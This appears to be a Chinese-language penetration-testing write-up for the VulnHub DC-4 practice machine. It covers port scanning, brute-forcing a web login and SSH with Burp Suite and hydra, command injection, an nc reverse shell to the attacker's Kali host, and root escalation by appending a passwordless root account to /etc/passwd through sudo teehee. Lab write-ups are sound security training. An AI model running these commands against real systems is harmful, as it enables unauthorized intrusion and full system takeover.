準備工作
在vulnhub官網下載DC:4靶機https://www.vulnhub.com/entry/dc-4,313/
匯入到vmware,設定成NAT模式
開啟kali準備進行滲透(ip:192.168.200.6)
資訊收集
利用nmap進行ip埠探測
nmap -sS 192.168.200.6/24
探測到ip為192.168.200.15的靶機,開放了22埠和80埠
再用nmap對所有埠進行探測,確保沒有別的遺漏資訊
nmap -sV -p- 192.168.200.15
先看看80埠,開啟網站是一個登陸介面
dirsearch掃描沒有發現別的頁面
用Wappalyzer外掛檢視發現是Nginx1.15.10框架
使用searchsploit查詢也沒有關於這個版本的漏洞
看來只能嘗試弱口令爆破了
弱口令爆破
這裡使用BurpSuite,也可以使用hydra
抓個包傳送到intruder設定positions,選擇cluster bomb模式將賬號密碼設定為兩個變數
在進入payload設定變數,因為是admin後臺管理系統,所以賬號是admin是確定的
在將字典匯入到密碼的變數中(字典可以在網上找)
根據返回長度可以看到happy就是密碼,登陸到後臺看看
裡面的介面有三個選項都是一些系統命令,看起來好像可以通過抓包來更改命令
抓包之後發現確實可以更改
Netcat反彈shell
用nc命令反彈shell給kali
使用方法參考NC使用筆記_LainWith的部落格-CSDN部落格
先在終端輸入nc -lvp 9999開啟監聽
然後在bp輸入命令反彈shell
nc -e /bin/sh 192.168.200.6 9999
使用python 通過pty.spawn()獲得互動式shell
python -c'import pty;pty.spawn("/bin/bash")'
在home目錄下找到了三個使用者的資料夾
在jim檔案中找到了密碼的備份檔案,使用hydra連線ssh進行爆破
hydra爆破
使用示例:
Examples:
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh -l 後面跟著 具體的使用者名稱
-p 後面跟著 具體的密碼
-L 後面跟著 使用者字典
-P 後面跟著 密碼字典
先將密碼儲存在psw檔案中,然後開始爆破
hydra -l jim -P psw -t 4 ssh://192.168.200.15
過程有點慢,但是得到密碼jibril04,連線看看
ssh [email protected] -p 22
成功連上
這裡看到說有一個郵件,找找看在哪
在/var/mail 中找到 內容是:
給了一個charles的密碼 ^xHhA&hvim0y,切換登陸看看su charles
可以看到無論是cat命令和進入root資料夾都被限制了,只能看看怎麼提權
許可權提升
先用sudo -l看看有什麼使用者可以獲得root許可權
發現teehee不需要密碼可以有root許可權,可以利用teehee提權
用teehee使用者新增一個admin使用者
echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
然後直接切換到admin使用者就有root許可權了
參考文章
DC靶機滲透-DC4_InventorMAO的部落格-CSDN部落格